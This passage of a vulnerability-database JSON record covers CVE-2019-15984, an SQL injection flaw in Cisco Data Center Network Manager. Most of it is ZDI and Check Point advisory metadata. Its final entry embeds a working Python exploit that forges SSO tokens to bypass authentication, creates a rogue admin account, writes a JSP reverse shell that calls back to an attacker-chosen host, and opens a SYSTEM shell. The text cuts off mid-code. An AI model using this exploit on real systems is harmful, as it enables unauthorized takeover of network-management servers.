["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-121", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-121/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:40", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/inventory/getHostEnclList endpoint. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getHostEnclList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-033", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-033/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:14", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getIslStatDataLength endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanIslStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-079", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-079/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:49", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/imagemanagement/gir/tasks endpoint. When parsing the filterStr parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager ImageManagement SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-018", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-018/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:48", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the fm/fmrest/virtualportchannel endpoint. When parsing the filterStr parameter or the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getAllVpc SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-021", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-021/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:16", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the StatisticsWSService/StatisticsWS service. When parsing the sortType parameter of the getNpvLinkStatList endpoint, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getNpvLinkStatList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-076", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-076/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:26", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/config/delivery/history service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getDeployerTaskDetails SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-059", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-059/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:22", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the rest/inventory/zones service. When parsing the sort parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getSanZoneList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-064", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-064/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:10:55", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the tasks endpoint. When parsing the filterStr parameter in the getGirTaskLength method, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker could leverage this vulnerability to disclose stored credentials, leading to further compromise.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getGirTaskLength SQL Injection Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-109", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:11:44", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Cisco Data Center Network Manager. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of requests to the DbInventoryWSService/DbInventoryWS service. When parsing a packet to the getIslList SOAP endpoint, the process does not properly validate a user-supplied string for the sortType parameter before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-03T00:00:00", "type": "zdi", "title": "Cisco Data Center Network Manager getLanIslList SQL Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-01-03T00:00:00", "id": "ZDI-20-037", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-037/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:15:28", "description": "An SQL injection vulnerability exists in Cisco Data Center Network Manager. The vulnerability is due to insufficient input validation when processing HTTP requests in the Java class smartLicensingController.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Data Center Network Manager SQL Injection (CVE-2019-15984)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15984"], "modified": "2020-05-10T00:00:00", "id": "CPAI-2019-2093", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T20:39:49", "description": "\nCisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-06T00:00:00", "type": "exploitpack", "title": "Cisco Data Center Network Manager 11.2.1 - getVmHostData SQL Injection", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-15976", "CVE-2019-15984"], "modified": "2020-02-06T00:00:00", "id": "EXPLOITPACK:F778AD5D626855F4BE149B4B8F57874E", "href": "", "sourceData": "#!/usr/bin/python\n\"\"\"\nCisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability\n\nTested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)\n- Release: 11.2(1)\n- Release Date: 18-Jun-2019\n- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip\n- Size: 1619.36 MB (1698022100 bytes)\n- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 \n\nBug 1: CVE-2019-15976 / ZDI-20-008\nBug 2: CVE-2019-15984 / ZDI-20-060\n\nExample:\n========\n\nsaturn:~ mr_me$ ./poc.py \n(+) usage: ./poc.py <target> <connectback>\n(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337\n\nsaturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337\n(+) created the account hacker:Hacked123\n(+) created the 1337/custom path!\n(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c\n(+) SQL Injection working!\n(+) wrote the si.jsp shell!\n(+) cleaned up the database!\n(+) starting handler on port 1337\n(+) connection from 192.168.100.122\n(+) pop thy shell!\nMicrosoft Windows [Version 6.3.9600]\n(c) 2013 Microsoft Corporation. All rights reserved.\n\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>whoami\nwhoami\nnt authority\\system\n\nC:\\Program Files\\Cisco Systems\\dcm\\wildfly-10.1.0.Final\\bin\\service>\n\nClean Up:\n=========\n\n1. delete from xmlDocs where user_name = '1337';\n2. delete si.jsp from the web root\n3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337\n\"\"\"\n\nimport re\nimport md5\nimport sys\nimport time\nimport socket\nimport base64\nimport requests\nimport telnetlib\nfrom threading import Thread\nfrom xml.etree import ElementTree\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef _get_jsp(cbh, cbp):\n \"\"\" get me some jsp for a connectback! \"\"\"\n jsp = \"\"\"\n <%%@page import=\"java.lang.*\"%%>\n <%%@page import=\"java.util.*\"%%>\n <%%@page import=\"java.io.*\"%%>\n <%%@page import=\"java.net.*\"%%>\n\n <%%\n // clean up\n String[] files = {\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml\", \n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/\",\n \"C:/Program Files/Cisco Systems/dcm/fm/reports/1337/\",\n };\n for (String s:files){ File f = new File(s); f.delete(); }\n File f = new File(application.getRealPath(\"/\" + this.getClass().getSimpleName().replaceFirst(\"_\",\".\")));\n f.delete();\n class StreamConnector extends Thread\n {\n InputStream we;\n OutputStream uo;\n\n StreamConnector( InputStream we, OutputStream uo )\n {\n this.we = we;\n this.uo = uo;\n }\n\n public void run()\n {\n BufferedReader dy = null;\n BufferedWriter zvi = null;\n try\n {\n dy = new BufferedReader( new InputStreamReader( this.we ) );\n zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );\n char buffer[] = new char[8192];\n int length;\n while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )\n {\n zvi.write( buffer, 0, length );\n zvi.flush();\n }\n } catch( Exception e ){}\n try\n {\n if( dy != null )\n dy.close();\n if( zvi != null )\n zvi.close();\n } catch( Exception e ){}\n }\n }\n\n try\n {\n String ShellPath;\n ShellPath = new String(\"cmd.exe\");\n Socket socket = new Socket( \"%s\", %s);\n Process process = Runtime.getRuntime().exec( ShellPath );\n ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();\n ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();\n } catch( Exception e ) {}\n %%>\n \"\"\" % (cbh, cbp)\n return jsp\n\ndef get_session(target, user, password):\n \"\"\" we have bypassed auth at this point and created an admin \"\"\"\n d = {\n \"j_username\" : user,\n \"j_password\" : password\n }\n uri = \"https://%s/j_spring_security_check\" % target\n r = requests.post(uri, data=d, verify=False, allow_redirects=False)\n if \"Set-Cookie\" in r.headers:\n match = re.search(r\"JSESSIONID=(.{56}).*resttoken=(\\d{1,4}:.{44});\", r.headers[\"Set-Cookie\"])\n if match:\n sessionid = match.group(1)\n resttoken = match.group(2)\n return { \"JSESSIONID\" : sessionid, \"resttoken\": resttoken}\n return False\n\ndef craft_soap_header():\n soap_header = '\\t<SOAP-ENV:Header xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n soap_header += '<m:ssoToken xmlns:m=\"http://ep.jaxws.dcbu.cisco.com/\">%s</m:ssoToken>' % gen_ssotoken()\n soap_header += '\\t</SOAP-ENV:Header>'\n return soap_header\n\ndef we_can_trigger_folder_path_creation(target):\n \"\"\" craft the path location and db entry for the traversal \"\"\"\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:saveReportTemplate>'\n soap_body += '\\t\\t\\t<reportTemplateName>si</reportTemplateName>'\n soap_body += '\\t\\t\\t<userName>1337</userName>'\n soap_body += '\\t\\t\\t<updatedAttrs></updatedAttrs>'\n soap_body += '\\t\\t\\t<pmInterval>1337</pmInterval>'\n soap_body += '\\t\\t</ep:saveReportTemplate>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/ReportWSService/ReportWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_trigger_second_order_write(target, shellpath):\n \"\"\" trigger the traversal \"\"\"\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:openReportTemplate>'\n soap_body += '\\t\\t\\t<reportTemplateName>%s</reportTemplateName>' % shellpath\n soap_body += '\\t\\t\\t<userName>1337</userName>'\n soap_body += '\\t\\t</ep:openReportTemplate>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/ReportWSService/ReportWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef gen_ssotoken():\n \"\"\" auth bypass \"\"\"\n timestamp = 9999999999999 # we live forever\n username = \"hax\" # doesnt even need to exist!\n sessionid = 1337 # doesnt even need to exist!\n d = \"%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\" % (username, sessionid, timestamp)\n return \"%d.%d.%s.%s\" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)\n\ndef we_can_trigger_sql_injection(target, sql):\n \"\"\" stacked sqli primitive \"\"\"\n sqli = \";%s--\" % sql\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:getVmHostData>'\n soap_body += '\\t\\t\\t<arg0>'\n soap_body += '\\t\\t\\t\\t<sortField>vcluster</sortField>'\n soap_body += '\\t\\t\\t\\t<sortType>%s</sortType>' % sqli\n soap_body += '\\t\\t\\t</arg0>'\n soap_body += '\\t\\t\\t<arg1></arg1>'\n soap_body += '\\t\\t\\t<arg2></arg2>'\n soap_body += '\\t\\t\\t<arg3>false</arg3>'\n soap_body += '\\t\\t</ep:getVmHostData>'\n soap_body += '\\t</soapenv:Body>'\n soap_body += '</soapenv:Envelope>'\n uri = \"https://%s/DbInventoryWSService/DbInventoryWS\" % target\n r = requests.post(uri, data=soap_body, verify=False)\n if r.status_code == 200:\n return True\n return False\n\ndef we_can_leak_vfs(target):\n \"\"\" we use a information disclosure for the vfs path \"\"\"\n global vfs\n uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target\n c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')\n r = requests.get(uri, verify=False, auth=c)\n match = re.search(r\"temp\\\\(.{21}content-.{15,16})\", r.text)\n if match:\n vfs = str(match.group(1).replace(\"\\\\\",\"/\"))\n return True\n return False\n\ndef handler(lp):\n \"\"\" this is the client handler, to catch the connectback \"\"\"\n print \"(+) starting handler on port %d\" % lp\n t = telnetlib.Telnet()\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind((\"0.0.0.0\", lp))\n s.listen(1)\n conn, addr = s.accept()\n print \"(+) connection from %s\" % addr[0]\n t.sock = conn\n print \"(+) pop thy shell!\"\n t.interact()\n\ndef exec_code(t, usr, pwd, cbp):\n \"\"\" this function threads the client handler and sends off the attacking payload \"\"\"\n handlerthr = Thread(target=handler, args=(int(cbp),))\n handlerthr.start()\n r = requests.get(\"https://%s/si.jsp\" % t, cookies=get_session(t, usr, pwd), verify=False)\n\ndef we_can_add_user(target, usr, pwd):\n \"\"\" add a user so that we can reach our backdoor! \"\"\"\n soap_body = '<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ep=\"http://ep.san.jaxws.dcbu.cisco.com/\">'\n soap_body += craft_soap_header()\n soap_body += '\\t<soapenv:Body>'\n soap_body += '\\t\\t<ep:addUser>'\n soap_body += '\\t\\t\\t<userName>%s</userName>' % usr\n soap_body += '\\t\\t\\t<password>%s</password>' % pwd\n soap_body += 